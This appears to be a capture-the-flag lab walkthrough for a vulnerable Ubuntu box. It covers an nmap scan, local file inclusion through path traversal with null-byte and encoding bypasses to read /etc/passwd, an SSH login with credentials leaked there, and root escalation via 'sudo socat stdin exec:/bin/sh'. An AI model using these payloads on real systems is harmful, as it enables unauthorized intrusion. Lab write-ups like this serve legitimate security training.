# scan the given ip with any network-scanner i prefer nmap.

# Nmap 7.91 scan initiated Sat Jun 12 16:11:50 2021 as: nmap -sC -sV -oN nmap 10.10.2.150
$ nmap -sC -sV -Pn 10.10.73.72
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-12 16:55 EDT
Nmap scan report for 10.10.73.72
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.48 seconds
-----------------------------------------
Question> How to identify a LFI vuln?
  soln: suppose on a  website a image is stored like this> GET http://notpaypal.com/view_file?image=logo.png HTTP/1.1 
       to bypass it try: GET http://notpaypal.com/view_file?image=../../../../../../etc/passwd HTTP/1.1 {here, (../)use as many as you want.}
       sometimes, the website expect some extensions. like ".csv"
       to bypass that you can try 'NULL BYTE INJECTION' 
       
  #NULL BYTE INJ. > (%00) or try this (?).
    note: sometimes url_encoding is present.{i.e (.) is encoded as %2e and (/) is encoded as %2f }
            eg:- ../ == %2e%2e%2f.so if the above method not working then do this.
            
 -----------------------------------------
 
 # visit here: http://10.10.73.72/article?name=lfiattack
          try to bypass it : http://10.10.73.72/article?name=../../../../../etc/passwd
                it worked. (hint: try to see it in view-source-page for better view.)
visit: view-source:http://10.10.73.72/article?name=../../../../../etc/passwd         
                    
            root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash
#xxxxxxxxx:passxxxxxxxxxx for the ssh.     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< O.o O.o O.o
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
-----------------------------------------------------------

# now try to login with ssh;

$ ssh falconfeast@10.10.73.72
The authenticity of host '10.10.73.72 (10.10.73.72)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.73.72' (ECDSA) to the list of known hosts.
falconfeast@10.10.73.72's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jun 12 18:58:56 IST 2021

  System load:  0.08              Processes:           84
  Usage of /:   34.8% of 9.78GB   Users logged in:     0
  Memory usage: 65%               IP address for eth0: 10.10.73.72
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

3 packages can be updated.
3 updates are security updates.


Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107
falconfeast@inclusion:~$ 
\0/ \0/ \0/ yay we got the ssh shell.

------------------------------

falconfeast@inclusion:~$ cat user.txt
###################

----------------------------------

# Hunt for the root flag :/

falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat


visit here:https://gtfobins.github.io/ <to find {socat} prevesc .
    
-----------------------------------

falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
pwd
/home/falconfeast
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /root/root.txt
xxxxxxxxxxxxxxxxxx































































            
 
